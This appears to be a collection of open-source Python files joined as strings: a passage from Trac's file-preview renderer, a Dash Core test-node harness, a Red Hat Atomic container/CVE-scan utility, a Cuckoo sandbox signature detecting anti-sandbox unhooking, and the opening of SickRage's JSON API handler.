object) to an `unicode` object.\n\n This calls `trac.util.to_unicode` with the `charset` provided,\n or the one obtained by `Mimeview.get_charset()`.\n """"""\n if not charset:\n charset = self.get_charset(content, mimetype)\n return to_unicode(content, charset)\n\n def configured_modes_mapping(self, renderer):\n """"""Return a MIME type to `(mode,quality)` mapping for given `option`""""""\n types, option = {}, \'%s_modes\' % renderer\n for mapping in self.config[\'mimeviewer\'].getlist(option):\n if not mapping:\n continue\n try:\n mimetype, mode, quality = mapping.split(\':\')\n types[mimetype] = (mode, int(quality))\n except (TypeError, ValueError):\n self.log.warning(""Invalid mapping \'%s\' specified in \'%s\' ""\n ""option."", mapping, option)\n return types\n \n def preview_data(self, context, content, length, mimetype, filename,\n url=None, annotations=None, force_source=False):\n """"""Prepares a rendered preview of the given `content`.\n\n Note: `content` will usually be an object with a `read` method.\n """""" \n data = {\'raw_href\': url, \'size\': length,\n \'max_file_size\': self.max_preview_size,\n \'max_file_size_reached\': False,\n \'rendered\': None,\n }\n if length >= self.max_preview_size:\n data[\'max_file_size_reached\'] = True\n else:\n result = self.render(context, mimetype, content, filename, url,\n annotations, force_source=force_source)\n data[\'rendered\'] = result\n return data\n\n def send_converted(self, req, in_type, content, selector, filename=\'file\'):\n """"""Helper method for converting `content` and sending it directly.\n\n `selector` can be either a key or a MIME Type.""""""\n from trac.web.api import RequestDone\n content, output_type, ext = self.convert_content(req, in_type,\n content, selector)\n if isinstance(content, unicode):\n content = content.encode(\'utf-8\')\n req.send_response(200)\n req.send_header(\'Content-Type\', output_type)\n req.send_header(\'Content-Length\', len(content))\n if filename:\n req.send_header(\'Content-Disposition\',\n content_disposition(filename=\'%s.%s\' % \n (filename, ext)))\n req.end_headers()\n req.write(content)\n raise RequestDone\n\n\ndef _group_lines(stream):\n space_re = re.compile(\'(?P (?: +))|^(?P<\\w+.*?>)?( )\')\n def pad_spaces(match):\n m = match.group(\'spaces\')\n if m:\n div, mod = divmod(len(m), 2)\n return div * u\'\\xa0 \' + mod * u\'\\xa0\'\n return (match.group(\'tag\') or \'\') + u\'\\xa0\'\n\n def _generate():\n stack = []\n def _reverse():\n for event in reversed(stack):\n if event[0] is START:\n yield END, event[1][0], event[2]\n else:\n yield END_NS, event[1][0], event[2]\n\n for kind, data, pos in stream:\n if kind is TEXT:\n lines = data.split(\'\\n\')\n if lines:\n # First element\n for e in stack:\n yield e\n yield kind, lines.pop(0), pos\n for e in _reverse():\n yield e\n # Subsequent ones, prefix with \\n\n for line in lines:\n yield TEXT, \'\\n\', pos\n for e in stack:\n yield e\n yield kind, line, pos\n for e in _reverse():\n yield e\n else:\n if kind is START or kind is START_NS:\n stack.append((kind, data, pos))\n elif kind is END or kind is END_NS:\n stack.pop()\n else:\n yield kind, data, pos\n\n buf = []\n \n # Fix the \\n at EOF.\n if not isinstance(stream, list):\n stream = list(stream)\n found_text = False\n \n for i in range(len(stream)-1, -1, -1):\n if stream[i][0] is TEXT:\n e = stream[i]\n # One chance to strip a \\n\n if not found_text and e[1].endswith(\'\\n\'):\n stream[i] = (e[0], e[1][:-1], e[2])\n if len(e[1]):\n found_text = True\n break\n if not found_text:\n raise StopIteration\n\n for kind, data, pos in _generate():\n if kind is TEXT and data == \'\\n\':\n yield Stream(buf[:])\n del buf[:]\n else:\n if kind is TEXT:\n data = space_re.sub(pad_spaces, data)\n buf.append((kind, data, pos))\n if buf:\n yield Stream(buf[:])\n\n\n# -- Default annotators\n\nclass LineNumberAnnotator(Component):\n """"""Text annotator that adds a column with line numbers.""""""\n implements(IHTMLPreviewAnnotator)\n\n # ITextAnnotator methods\n\n def get_annotation_type(self):\n return \'lineno\', _(\'Line\'), _(\'Line numbers\')\n\n def get_annotation_data(self, context):\n return None\n\n def annotate_row(self, context, row, lineno, line, data):\n row.append(tag.th(id=\'L%s\' % lineno)(\n tag.a(lineno, href=\'#L%s\' % lineno)\n ))\n\n\n# -- Default renderers\n\nclass PlainTextRenderer(Component):\n """"""HTML preview renderer for plain text, and fallback for any kind of text\n for which no more specific renderer is available.\n """"""\n implements(IHTMLPreviewRenderer)\n\n expand_tabs = True\n returns_source = True\n\n def get_quality_ratio(self, mimetype):\n if mimetype in Mimeview(self.env).treat_as_binary:\n return 0\n return 1\n\n def render(self, context, mimetype, content, filename=None, url=None):\n if is_binary(content):\n self.log.debug(""Binary data; no preview available"")\n return\n\n self.log.debug(""Using default plain text mimeviewer"")\n return content_to_unicode(self.env, content, mimetype)\n\n\nclass ImageRenderer(Component):\n """"""Inline image display.\n \n This component doesn\'t need the `content` at all.\n """"""\n implements(IHTMLPreviewRenderer)\n\n def get_quality_ratio(self, mimetype):\n if mimetype.startswith(\'image/\'):\n return 8\n return 0\n\n def render(self, context, mimetype, content, filename=None, url=None):\n if url:\n return tag.div(tag.img(src=url, alt=filename),\n class_=\'image-file\')\n\n\nclass WikiTextRenderer(Component):\n """"""HTML renderer for files containing Trac\'s own Wiki formatting markup.""""""\n implements(IHTMLPreviewRenderer)\n\n def get_quality_ratio(self, mimetype):\n if mimetype in (\'text/x-trac-wiki\', \'application/x-trac-wiki\'):\n return 8\n return 0\n\n def render(self, context, mimetype, content, filename=None, url=None):\n from trac.wiki.formatter import format_to_html\n return format_to_html(self.env, context,\n content_to_unicode(self.env, content, mimetype))\n', '#!/usr/bin/env python3\n# Copyright (c) 2017 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n""""""Class for dashd node under test""""""\n\nimport decimal\nimport errno\nimport http.client\nimport json\nimport logging\nimport os\nimport subprocess\nimport time\n\nfrom .authproxy import JSONRPCException\nfrom .mininode import NodeConn\nfrom .util import (\n assert_equal,\n get_rpc_proxy,\n rpc_url,\n wait_until,\n p2p_port,\n)\n\nBITCOIND_PROC_WAIT_TIMEOUT = 60\n\nclass TestNode():\n """"""A class for representing a dashd node under test.\n\n This class contains:\n\n - state about the node (whether it\'s running, etc)\n - a Python subprocess.Popen object representing the running process\n - an RPC connection to the node\n - one or more P2P connections to the node\n\n\n To make things easier for the test writer, any unrecognised messages will\n be dispatched to the RPC connection.""""""\n\n def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir):\n self.index = i\n self.datadir = os.path.join(dirname, ""node"" + str(i))\n self.rpchost = rpchost\n if timewait:\n self.rpc_timeout = timewait\n else:\n # Wait for up to 60 seconds for the RPC server to respond\n self.rpc_timeout = 60\n if binary is None:\n self.binary = os.getenv(""BITCOIND"", ""dashd"")\n else:\n self.binary = binary\n self.stderr = stderr\n self.coverage_dir = coverage_dir\n # Most callers will just need to add extra args to the standard list below. For those callers that need more flexibity, they can just set the args property directly.\n self.extra_args = extra_args\n self.args = [self.binary, ""-datadir="" + self.datadir, ""-server"", ""-keypool=1"", ""-discover=0"", ""-rest"", ""-logtimemicros"", ""-debug"", ""-debugexclude=libevent"", ""-debugexclude=leveldb"", ""-mocktime="" + str(mocktime), ""-uacomment=testnode%d"" % i]\n\n self.cli = TestNodeCLI(os.getenv(""BITCOINCLI"", ""dash-cli""), self.datadir)\n\n # Don\'t try auto backups (they fail a lot when running tests)\n self.args.append(""-createwalletbackups=0"")\n\n self.running = False\n self.process = None\n self.rpc_connected = False\n self.rpc = None\n self.url = None\n self.log = logging.getLogger(\'TestFramework.node%d\' % i)\n\n self.p2ps = []\n\n def __getattr__(self, name):\n """"""Dispatches any unrecognised messages to the RPC connection.""""""\n assert self.rpc_connected and self.rpc is not None, ""Error: no RPC connection""\n return getattr(self.rpc, name)\n\n def start(self, extra_args=None, stderr=None):\n """"""Start the node.""""""\n if extra_args is None:\n extra_args = self.extra_args\n if stderr is None:\n stderr = self.stderr\n self.process = subprocess.Popen(self.args + extra_args, stderr=stderr)\n self.running = True\n self.log.debug(""dashd started, waiting for RPC to come up"")\n\n def wait_for_rpc_connection(self):\n """"""Sets up an RPC connection to the dashd process. Returns False if unable to connect.""""""\n # Poll at a rate of four times per second\n poll_per_s = 4\n for _ in range(poll_per_s * self.rpc_timeout):\n assert self.process.poll() is None, ""dashd exited with status %i during initialization"" % self.process.returncode\n try:\n self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)\n self.rpc.getblockcount()\n # If the call to getblockcount() succeeds then the RPC connection is up\n self.rpc_connected = True\n self.url = self.rpc.url\n self.log.debug(""RPC successfully started"")\n return\n except IOError as e:\n if e.errno != errno.ECONNREFUSED: # Port not yet open?\n raise # unknown IO error\n except JSONRPCException as e: # Initialization phase\n # -28 RPC in warmup\n # -342 Service unavailable, RPC server started but is shutting down due to error\n if e.error[\'code\'] != -28 and e.error[\'code\'] != -342:\n raise # unknown JSON RPC exception\n except ValueError as e: # cookie file not found and no rpcuser or rpcassword. dashd still starting\n if ""No RPC credentials"" not in str(e):\n raise\n time.sleep(1.0 / poll_per_s)\n raise AssertionError(""Unable to connect to dashd"")\n\n def get_wallet_rpc(self, wallet_name):\n assert self.rpc_connected\n assert self.rpc\n wallet_path = ""wallet/%s"" % wallet_name\n return self.rpc / wallet_path\n\n def stop_node(self, wait=0):\n """"""Stop the node.""""""\n if not self.running:\n return\n self.log.debug(""Stopping node"")\n try:\n self.stop(wait=wait)\n except http.client.CannotSendRequest:\n self.log.exception(""Unable to stop node."")\n del self.p2ps[:]\n\n def is_node_stopped(self):\n """"""Checks whether the node has stopped.\n\n Returns True if the node has stopped. False otherwise.\n This method is responsible for freeing resources (self.process).""""""\n if not self.running:\n return True\n return_code = self.process.poll()\n if return_code is None:\n return False\n\n # process has stopped. Assert that it didn\'t return an error code.\n assert_equal(return_code, 0)\n self.running = False\n self.process = None\n self.rpc_connected = False\n self.rpc = None\n self.log.debug(""Node stopped"")\n return True\n\n def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):\n wait_until(self.is_node_stopped, timeout=timeout)\n\n def node_encrypt_wallet(self, passphrase):\n """"""""Encrypts the wallet.\n\n This causes dashd to shutdown, so this method takes\n care of cleaning up resources.""""""\n self.encryptwallet(passphrase)\n self.wait_until_stopped()\n\n def add_p2p_connection(self, p2p_conn, **kwargs):\n """"""Add a p2p connection to the node.\n\n This method adds the p2p connection to the self.p2ps list and also\n returns the connection to the caller.""""""\n if \'dstport\' not in kwargs:\n kwargs[\'dstport\'] = p2p_port(self.index)\n if \'dstaddr\' not in kwargs:\n kwargs[\'dstaddr\'] = \'127.0.0.1\'\n self.p2ps.append(p2p_conn)\n kwargs.update({\'rpc\': self.rpc, \'callback\': p2p_conn})\n p2p_conn.add_connection(NodeConn(**kwargs))\n\n return p2p_conn\n\n @property\n def p2p(self):\n """"""Return the first p2p connection\n\n Convenience property - most tests only use a single p2p connection to each\n node, so this saves having to write node.p2ps[0] many times.""""""\n assert self.p2ps, ""No p2p connection""\n return self.p2ps[0]\n\n def disconnect_p2ps(self):\n """"""Close all p2p connections to the node.""""""\n for p in self.p2ps:\n # Connection could have already been closed by other end.\n if p.connection is not None:\n p.connection.disconnect_node()\n self.p2ps = []\n\n\nclass TestNodeCLI():\n """"""Interface to bitcoin-cli for an individual node""""""\n\n def __init__(self, binary, datadir):\n self.args = []\n self.binary = binary\n self.datadir = datadir\n self.input = None\n\n def __call__(self, *args, input=None):\n # TestNodeCLI is callable with bitcoin-cli command-line args\n self.args = [str(arg) for arg in args]\n self.input = input\n return self\n\n def __getattr__(self, command):\n def dispatcher(*args, **kwargs):\n return self.send_cli(command, *args, **kwargs)\n return dispatcher\n\n def send_cli(self, command, *args, **kwargs):\n """"""Run bitcoin-cli command. Deserializes returned string as python object.""""""\n\n pos_args = [str(arg) for arg in args]\n named_args = [str(key) + ""="" + str(value) for (key, value) in kwargs.items()]\n assert not (pos_args and named_args), ""Cannot use positional arguments and named arguments in the same bitcoin-cli call""\n p_args = [self.binary, ""-datadir="" + self.datadir] + self.args\n if named_args:\n p_args += [""-named""]\n p_args += [command] + pos_args + named_args\n process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n cli_stdout, cli_stderr = process.communicate(input=self.input)\n returncode = process.poll()\n if returncode:\n # Ignore cli_stdout, raise with cli_stderr\n raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)\n return json.loads(cli_stdout, parse_float=decimal.Decimal)\n', '# !/usr/bin/python\n# Copyright (C) 2015 Red Hat, All rights reserved.\n# AUTHORS: Alex Collins dummy@email.com\n\nimport sys\nimport json\nimport subprocess\nimport collections\nfrom fnmatch import fnmatch as matches\nfrom docker.utils import kwargs_from_env\n\nimport docker\nimport selinux\n\n""""""Atomic Utility Module""""""\n\nReturnTuple = collections.namedtuple(\'ReturnTuple\',\n [\'return_code\', \'stdout\', \'stderr\'])\n\nif sys.version_info[0] < 3:\n input = raw_input\nelse:\n input = input\n\n\ndef _decompose(compound_name):\n """""" \'[reg/]repo[:tag]\' -> (reg, repo, tag) """"""\n reg, repo, tag = \'\', compound_name, \'\'\n if \'/\' in repo:\n reg, repo = repo.split(\'/\', 1)\n if \':\' in repo:\n repo, tag = repo.rsplit(\':\', 1)\n return reg, repo, tag\n\n\ndef image_by_name(img_name, images=None):\n """"""\n Returns a list of image data for images which match img_name. Will\n optionally take a list of images from a docker.Client.images\n query to avoid multiple docker queries.\n """"""\n i_reg, i_rep, i_tag = _decompose(img_name)\n\n # Correct for bash-style matching expressions.\n if not i_reg:\n i_reg = \'*\'\n if not i_tag:\n i_tag = \'*\'\n\n # If the images were not passed in, go get them.\n if images is None:\n c = docker.Client(**kwargs_from_env())\n images = c.images(all=False)\n\n valid_images = []\n for i in images:\n for t in i[\'RepoTags\']:\n reg, rep, tag = _decompose(t)\n if matches(reg, i_reg) \\\n and matches(rep, i_rep) \\\n and matches(tag, i_tag):\n valid_images.append(i)\n break\n # Some repo after decompose end up with the img_name\n # at the end. i.e. rhel7/rsyslog\n if rep.endswith(img_name):\n valid_images.append(i)\n break\n return valid_images\n\n\ndef subp(cmd):\n """"""\n Run a command as a subprocess.\n Return a triple of return code, standard out, standard err.\n """"""\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = proc.communicate()\n return ReturnTuple(proc.returncode, stdout=out, stderr=err)\n\n\ndef default_container_context():\n if selinux.is_selinux_enabled() != 0:\n fd = open(selinux.selinux_lxc_contexts_path())\n for i in fd.readlines():\n name, context = i.split(""="")\n if name.strip() == ""file"":\n return context.strip(""\\n\\"" "")\n return """"\n\n\ndef writeOut(output, lf=""\\n""):\n sys.stdout.flush()\n sys.stdout.write(str(output) + lf)\n\n\ndef output_json(json_data):\n \'\'\' Pretty print json data \'\'\'\n writeOut(json.dumps(json_data, indent=4, separators=(\',\', \': \')))\n\n\ndef print_scan_summary(json_data, names=None):\n \'\'\'\n Print a summary of the data returned from a\n CVE scan.\n \'\'\'\n max_col_width = 50\n min_width = 15\n\n def _max_width(data):\n max_name = 0\n for name in data:\n max_name = len(data[name]) if len(data[name]) > max_name \\\n else max_name\n # If the max name length is less that max_width\n if max_name < min_width:\n max_name = min_width\n\n # If the man name is greater than the max col leng\n # we wish to use\n if max_name > max_col_width:\n max_name = max_col_width\n\n return max_name\n\n clean = True\n\n if len(names) > 0:\n max_width = _max_width(names)\n else:\n max_width = min_width\n template = ""{0:"" + str(max_width) + ""} {1:5} {2:5} {3:5} {4:5}""\n sevs = [\'critical\', \'important\', \'moderate\', \'low\']\n writeOut(template.format(""Container/Image"", ""Cri"", ""Imp"", ""Med"", ""Low""))\n writeOut(template.format(""-"" * max_width, ""---"", ""---"", ""---"", ""---""))\n res_summary = json_data[\'results_summary\']\n for image in res_summary.keys():\n image_res = res_summary[image]\n if \'msg\' in image_res.keys():\n tmp_tuple = (image_res[\'msg\'], """", """", """", """")\n else:\n if len(names) < 1:\n image_name = image[:max_width]\n else:\n image_name = names[image][-max_width:]\n if len(image_name) == max_col_width:\n image_name = \'...\' + image_name[-(len(image_name) - 3):]\n\n tmp_tuple = tuple([image_name] +\n [str(image_res[sev]) for sev in sevs])\n sev_results = [image_res[sev] for sev in\n sevs if image_res[sev] > 0]\n if len(sev_results) > 0:\n clean = False\n writeOut(template.format(*tmp_tuple))\n writeOut("""")\n return clean\n\n\ndef print_detail_scan_summary(json_data, names=None):\n \'\'\'\n Print a detailed summary of the data returned from\n a CVE scan.\n \'\'\'\n clean = True\n sevs = [\'Critical\', \'Important\', \'Moderate\', \'Low\']\n cve_summary = json_data[\'host_results\']\n image_template = "" {0:10}: {1}""\n cve_template = "" {0:10}: {1}""\n for image in cve_summary.keys():\n image_res = cve_summary[image]\n writeOut("""")\n writeOut(image[:12])\n if not image_res[\'isRHEL\']:\n writeOut(image_template.format(""Result"",\n ""Not based on Red Hat""\n ""Enterprise Linux""))\n continue\n else:\n writeOut(image_template.format(""OS"", image_res[\'os\'].rstrip()))\n scan_results = image_res[\'cve_summary\'][\'scan_results\']\n\n for sev in sevs:\n if sev in scan_results:\n clean = False\n writeOut(image_template.format(sev,\n str(scan_results[sev][\'num\'])))\n for cve in scan_results[sev][\'cves\']:\n writeOut(cve_template.format(""CVE"", cve[\'cve_title\']))\n writeOut(cve_template.format(""CVE URL"",\n cve[\'cve_ref_url\']))\n writeOut(cve_template.format(""RHSA ID"",\n cve[\'rhsa_ref_id\']))\n writeOut(cve_template.format(""RHSA URL"",\n cve[\'rhsa_ref_url\']))\n writeOut("""")\n return clean\n\n\ndef get_mounts_by_path():\n \'\'\'\n Gets all mounted devices and paths\n :return: dict of mounted devices and related information by path\n \'\'\'\n mount_info = []\n f = open(\'/proc/mounts\', \'r\')\n for line in f:\n _tmp = line.split("" "")\n mount_info.append({\'path\': _tmp[1],\n \'device\': _tmp[0],\n \'type\': _tmp[2],\n \'options\': _tmp[3]\n }\n )\n return mount_info\n\n\ndef is_dock_obj_mounted(docker_obj):\n \'\'\'\n Check if the provided docker object, which needs to be an ID,\n is currently mounted and should be considered ""busy""\n :param docker_obj: str, must be in ID format\n :return: bool True or False\n \'\'\'\n mount_info = get_mounts_by_path()\n devices = [x[\'device\'] for x in mount_info]\n # If we can find the ID of the object in the list\n # of devices which comes from mount, safe to assume\n # it is busy.\n return any(docker_obj in x for x in devices)\n\n\ndef urllib3_disable_warnings():\n if \'requests\' not in sys.modules:\n import requests\n else:\n requests = sys.modules[\'requests\']\n\n # On latest Fedora, this is a symlink\n if hasattr(requests, \'packages\'):\n requests.packages.urllib3.disable_warnings() # pylint: disable=maybe-no-member\n else:\n # But with python-requests-2.4.3-1.el7.noarch, we need\n # to talk to urllib3 directly\n have_urllib3 = False\n try:\n if \'urllib3\' not in sys.modules:\n import urllib3\n have_urllib3 = True\n except ImportError:\n pass\n if have_urllib3:\n # Except only call disable-warnings if it exists\n if hasattr(urllib3, \'disable_warnings\'):\n urllib3.disable_warnings()\n', '# Copyright (C) 2014 Claudio ""nex"" Guarnieri (@botherder), Accuvant, Inc. (dummy@email.com)\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nfrom lib.cuckoo.common.abstracts import Signature\n\nclass Unhook(Signature):\n name = ""antisandbox_unhook""\n description = ""Tries to unhook or modify Windows functions monitored by Cuckoo""\n severity = 3\n confidence = 60\n categories = [""anti-sandbox""]\n authors = [""nex"",""Accuvant""]\n minimum = ""1.2""\n evented = True\n\n filter_categories = set([""__notification__""])\n\n def __init__(self, *args, **kwargs):\n Signature.__init__(self, *args, **kwargs)\n self.saw_unhook = False\n self.unhook_info = set()\n\n def on_call(self, call, process):\n subcategory = self.check_argument_call(call,\n api=""__anomaly__"",\n name=""Subcategory"",\n pattern=""unhook"")\n if subcategory:\n self.saw_unhook = True\n funcname = self.get_argument(call, ""FunctionName"")\n if funcname != """":\n if (funcname != ""SetUnhandledExceptionFilter"" and funcname != ""SetWindowsHookExW"" and funcname != ""UnhookWindowsHookEx"" and\n funcname != ""CoCreateInstance"") or self.get_argument(call, ""UnhookType"") != ""modification"":\n self.unhook_info.add(""function_name: "" + funcname + "", type: "" + self.get_argument(call, ""UnhookType""))\n \n def on_complete(self):\n if len(self.unhook_info) > 5:\n weight = len(self.unhook_info)\n confidence = 100\n\n if not self.unhook_info:\n self.saw_unhook = False\n\n for info in self.unhook_info:\n self.data.append({""unhook"" : info })\n return self.saw_unhook\n', '# coding=utf-8\n# Author: Dennis Lutter dummy@email.com\n# Author: Jonathon Saine dummy@email.com\n# URL: http://code.google.com/p/sickbeard/\n#\n# This file is part of SickRage.\n#\n# SickRage is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# SickRage is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with SickRage. If not, see .\n\n# TODO: break this up into separate files\n# pylint: disable=C0301,C0302\n# pylint: disable=E1101,E0202,C0111,C0103\n\nimport io\nimport os\nimport re\nimport time\nimport urllib\nimport datetime\nimport traceback\n\nimport sickbeard\nfrom sickrage.helper.common import dateFormat, dateTimeFormat, pretty_file_size, sanitize_filename, timeFormat\nfrom sickrage.helper.encoding import ek\nfrom sickrage.helper.exceptions import CantUpdateShowException, ex, ShowDirectoryNotFoundException\nfrom sickrage.helper.quality import get_quality_string\nfrom sickrage.media.ShowFanArt import ShowFanArt\nfrom sickrage.media.ShowNetworkLogo import ShowNetworkLogo\nfrom sickrage.media.ShowPoster import ShowPoster\nfrom sickrage.media.ShowBanner import ShowBanner\nfrom sickrage.show.ComingEpisodes import ComingEpisodes\nfrom sickrage.show.History import History\nfrom sickrage.show.Show import Show\nfrom sickrage.system.Restart import Restart\nfrom sickrage.system.Shutdown import Shutdown\nfrom sickbeard.versionChecker import CheckVersion\nfrom sickbeard import db, logger, ui, helpers\nfrom sickbeard import search_queue\nfrom sickbeard import image_cache\nfrom sickbeard import classes\nfrom sickbeard import processTV\nfrom sickbeard import network_timezones, sbdatetime\nfrom sickbeard.common import DOWNLOADED\nfrom sickbeard.common import FAILED\nfrom sickbeard.common import IGNORED\nfrom sickbeard.common import Overview\nfrom sickbeard.common import Quality\nfrom sickbeard.common import SKIPPED\nfrom sickbeard.common import SNATCHED\nfrom sickbeard.common import SNATCHED_PROPER\nfrom sickbeard.common import UNAIRED\nfrom sickbeard.common import UNKNOWN\nfrom sickbeard.common import WANTED\nfrom sickbeard.common import ARCHIVED\nfrom sickbeard.common import statusStrings\n\ntry:\n import json\nexcept ImportError:\n # pylint: disable=F0401\n import simplejson as json\n\n# pylint: disable=F0401\nfrom tornado.web import RequestHandler\n\nindexer_ids = [""indexerid"", ""tvdbid""]\n\nRESULT_SUCCESS = 10 # only use inside the run methods\nRESULT_FAILURE = 20 # only use inside the run methods\nRESULT_TIMEOUT = 30 # not used yet :(\nRESULT_ERROR = 40 # only use outside of the run methods !\nRESULT_FATAL = 50 # only use in Api.default() ! this is the ""we encountered an internal error"" error\nRESULT_DENIED = 60 # only use in Api.default() ! this is the access denied error\nresult_type_map = {\n RESULT_SUCCESS: ""success"",\n RESULT_FAILURE: ""failure"",\n RESULT_TIMEOUT: ""timeout"",\n RESULT_ERROR: ""error"",\n RESULT_FATAL: ""fatal"",\n RESULT_DENIED: ""denied"",\n}\n\n\n# basically everything except RESULT_SUCCESS / success is bad\n\n\nclass ApiHandler(RequestHandler):\n """""" api class that returns json results """"""\n version = 5 # use an int since float-point is unpredictable\n\n def __init__(self, *args, **kwargs):\n super(ApiHandler, self).__init__(*args, **kwargs)\n\n # def set_default_headers(self):\n # self.set_header(\'Cache-Control\', \'no-store, no-cache, must-revalidate, max-age=0\')\n\n def get(self, *args, **kwargs):\n kwargs = self.request.arguments\n for arg, value in kwargs.iteritems():\n if len(value) == 1:\n kwargs[arg] = value[0]\n\n args = args[1:]\n\n # set the output callback\n # default json\n output_callback_dict = {\n \'default\': self._out_as_json,\n \'image\': self._out_as_image,\n }\n\n access_msg = u""API :: "" + self.request.remote_ip + "" - gave correct API KEY. ACCESS GRANTED""\n logger.log(access_msg, logger.DEBUG)\n\n # set the original call_dispatcher as the local _call_dispatcher\n _call_dispatcher = self.call_dispatcher\n # if profile was set wrap ""_call_dispatcher"" in the profile function\n if \'profile\' in kwargs:\n from profilehooks import profile\n\n _call_dispatcher = profile(_call_dispatcher, immediate=True)\n del kwargs[""profile""]\n\n try:\n out_dict = _call_dispatcher(args, kwargs)\n except Exception, e: # real internal error oohhh nooo :(\n logger.log(u""API :: "" + ex(e), logger.ERROR)\n error_data = {\n ""error_msg"": ex(e),\n ""args"": args,\n ""kwargs"": kwargs\n }\n out_dict = _responds(RESULT_FATAL, error_data,\n ""SickRage encountered an internal error! Please report to the Devs"")\n\n if \'outputType\' in out_dict:\n output_callback = output_callback_dict[out_dict[\'outputType\']]\n else:\n output_callback = output_callback_dict[\'default\']\n\n try:\n self.finish(output_callback(out_dict))\n except Exception:\n pass\n\n def _out_as_image(self, _dict):\n self.set_header(\'Content-Type\', _dict[\'image\'].get_media_type())\n return _dict[\'image\'].get_media()\n\n def _out_as_json(self, _dict):\n self.set_header(""Content-Type"", ""application/json;charset=UTF-8"")\n try:\n out = json.dumps(_dict, ensure_ascii=False, sort_keys=True)\n callback = self.get_query_argument(\'callback\', None) or self.get_query_argument(\'jsonp\', None)\n if callback:\n out = callback + \'(\' + out + \');\' # wrap with JSONP call if requested\n except Exception, e: # if we fail to generate the output fake an error\n logger.log(u""API :: "" + traceback.format_exc(), logger.DEBUG)\n out = \'{""result"": ""%s"", ""message"": ""error while composing output: %s""}\' % \\\n (result_type_map[RESULT_ERROR], ex(e))\n return out\n\n def call_dispatcher(self, args, kwargs):\n """""" calls the appropriate CMD class\n looks for a cmd in args and kwargs\n or calls the TVDBShorthandWrapper when the first args element is a number\n or returns an error that there is no such cmd\n """"""\n logger.log(u""API :: all args: \'"" + str(args) + ""\'"", logger.DEBUG)\n logger.log(u""API :: all kwargs: \'"" + str(kwargs) + ""\'"", logger.DEBUG)\n\n commands = None\n if args:\n commands, args = args[0], args[1:]\n commands = kwargs.pop(""cmd"", commands)\n\n out_dict = {}\n if commands:\n commands = commands.split(""|"")\n multi_commands = len(commands) > 1\n for cmd in commands:\n cur_args, cur_kwargs = self.filter_params(cmd, args, kwargs)\n\n if len(cmd.split(""_"")) > 1:\n cmd, cmd_index = cmd.split(""_"")\n\n logger.log(u""API :: "" + cmd + "": cur_kwargs "" + str(cur_kwargs), logger.DEBUG)\n if not (cmd in (\'show.getbanner\', \'show.getfanart\', \'show.getnetworklogo\', \'show.getposter\') and\n multi_commands): # skip these cmd while chaining\n try:\n if cmd in function_mapper:\n func = function_mapper.get(cmd) # map function\n func.rh = self # add request handler to function\n cur_out_dict = func(cur_args, cur_kwargs).run() # call function and get response\n elif _is_int(cmd):\n cur_out_dict = TVDBShorthandWrapper(cur_args, cur_kwargs, cmd).run()\n else:\n cur_out_dict = _responds(RESULT_ERROR, ""No such cmd: \'"" + cmd + ""\'"")\n except ApiError as error: # Api errors that we raised, they are harmless\n cur_out_dict = _responds(RESULT_ERROR, msg=ex(error))\n else: # if someone chained one of the forbidden commands they will get an error for this one cmd\n cur_out_dict = _responds(RESULT_ERROR, msg=""The cmd \'"" + cmd + ""\' is not supported while chaining"")\n\n if multi_commands:\n # note: if duplicate commands are issued and one has an index defined it will override\n # all others or the other way around, depending on the command order\n # THIS IS NOT A BUG!\n if cmd_index: # do we need an index dict for this cmd ?\n if cmd not in out_dict:\n out_dict[cmd] = {}\n out_dict[cmd][cmd_index] = cur_out_dict\n else:\n out_dict[cmd] = cur_out_dict\n else:\n out_dict = cur_out_dict\n\n if multi_commands: # if we had multiple commands we have to wrap it in a response dict\n out_dict = _responds(RESULT_SUCCESS, out_dict)\n else: # index / no cmd given\n out_dict = CMD_SickBeard(args, kwargs).run()\n\n return out_dict\n\n def filter_params(self, cmd, args, kwargs):\n """""" return only params kwargs that are for cmd\n and rename them to a clean version (remove ""_"")\n args are shared across all commands\n\n all args and kwargs are lowered\n\n cmd are separated by ""|"" e.g. &cmd=shows|future\n kwargs are name-spaced with ""."" e.g. show.indexerid=101501\n if a kwarg has no namespace asking it anyways (global)\n\n full e.g.\n /api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc\n\n two calls of show.seasonlist\n one has the index ""asd"" the other one ""2""\n the ""indexerid"" kwargs / params have the indexed cmd as a namespace\n and the kwarg / param ""sort"" is a used as a global\n """"""\n cur_args = []\n for arg in args:\n cur_args.append(arg.lower())\n cur_args = tuple(cur_args)\n\n cur_kwargs = {}\n for kwarg in kwargs:\n if kwarg.find(cmd + ""."") == 0:\n clean_key = kwarg.rpartition(""."")[2]\n cur_kwargs[clean_key] = kwargs[kwarg].lower()\n elif ""."" not in kwarg: # the kwarg was not name-spaced therefore a ""global""\n cur_kwargs[kwarg] = kwargs[kwarg]\n return cur_args, cur_kwargs\n\n\nclass ApiCall(ApiHandler):\n\n _help = {""desc"": ""This command is not documented. Please report this to the developers.""}\n\n def __init__(self, args, kwargs):\n # missing\n try:\n if self._missing:\n self.run = self.return_missing\n except 